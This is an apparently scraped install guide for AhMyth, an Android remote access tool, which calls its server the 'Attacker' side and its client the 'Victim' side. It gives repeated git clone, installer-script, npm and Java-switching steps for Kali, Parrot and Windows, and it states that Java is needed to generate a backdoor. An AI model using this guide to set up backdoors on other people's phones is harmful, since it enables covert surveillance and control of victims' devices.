- the
Server
side - (Attacker) - the
Client
side - (Victim)
- From Source
- Manually using
npm
- Automatically using one of the
AhMyth-X.sh
installers
- npm & nodejs
- electron (To start the app)
- Java 11 openjdk (To generate backdoor)
- electron packager (if you want to build binaries for Windows/Mac/Linux)
git clone https://github.com/Morsmalleo/AhMyth.git
cd AhMyth/AhMyth-Server
chmod +x AhMyth-Kali.sh
sudo ./AhMyth-Kali.sh
Once the installer has installed AhMyth and its prerequisites, it will prompt you to change your java version
Select the corresponding number for Java 11 openjdk
- Example:0
Once the installer has installed AhMyth and its prerequisites, it will ask if you want to create a system shortcut
to be able to launch AhMyth from anywhere in the terminal or desktop.
- if you chose Yes for system shortcut - type
ahmyth
anywhere in your terminal to launch AhMyth - if you chose No for system shortcut - type
npm start
inside theAhMyth-Server
folder
git clone https://github.com/Morsmalleo/AhMyth.git
cd AhMyth/AhMyth-Server
npm install && npm audit
sudo apt install openjdk-11-jdk openjdk-11-jre
sudo update-alternatives --config java
Select the corresponding number for openjdk-11-jdk
- Example:0
npm start
git clone https://github.com/Morsmalleo/AhMyth.git
cd AhMyth/AhMyth-Server
chmod +x AhMyth-Parrot.sh
sudo ./AhMyth-Parrot.sh
Once the installer has installed AhMyth and its prerequisites, it will prompt you to change your java version
Select the corresponding number for Java 11 openjdk
- Example:0
Once the installer has installed AhMyth and its prerequisites, it will ask you if you want to create a system shortcut
to be able to launch AhMyth from anywhere in the terminal or desktop.
- if you chose Yes for system shortcut - type
ahmyth
anywhere in your terminal to launch AhMyth - if you chose No for system shortcut - type
npm start
inside theAhMyth-Server
folder
git clone https://github.com/Morsmalleo/AhMyth.git
cd AhMyth/AhMyth-Server
npm install && npm audit
sudo apt install openjdk-11-jdk openjdk-11-jre
sudo update-alternatives --config java
Select the corresponding number for openjdk-11-jdk
- Example:0
npm start
git clone https://github.com/Morsmalleo/AhMyth.git
cd AhMyth/AhMyth-Server
chmod +x AhMyth-Kali.sh
sudo ./AhMyth-Kali.sh
Once the installer has installed AhMyth and its prerequisites, it will prompt you to change your java version
Select the corresponding number for Java 11 openjdk
- Example:0
Once the installer has installed AhMyth and its prerequisites, it will ask if you want to create a system shortcut
to be able to launch AhMyth from anywhere in the terminal or desktop.
- if you chose Yes for system shortcut - type
ahmyth
anywhere in your terminal to launch AhMyth - if you chose No for system shortcut - type
npm start
inside theAhMyth-Server
folder
git clone https://github.com/Morsmalleo/AhMyth.git
cd AhMyth/AhMyth-Server
npm install && npm audit
sudo apt install openjdk-11-jdk openjdk-11-jre
sudo update-alternatives --config java
Select the corresponding number for openjdk-11-jdk
- Example:0
npm start
- COMING SOON!
- Install npm & nodejs for Windows 10 -
https://nodejs.org/en/download/
- Install Java 11 for Windows 10 -
https://www.oracle.com/au/java/technologies/javase-jdk11-downloads.html
- Install Git for Windows 10 -
https://git-scm.com/downloads
Right-click on any empty space on the Desktop and select Git Bash Here
then type the following commands below
git clone https://github.com/Morsmalleo/AhMyth
cd C:\Users\your-username-here\Desktop\AhMyth\AhMyth-Server
npm install && npm audit
npm start
ornpx electron ./app --no-sandbox start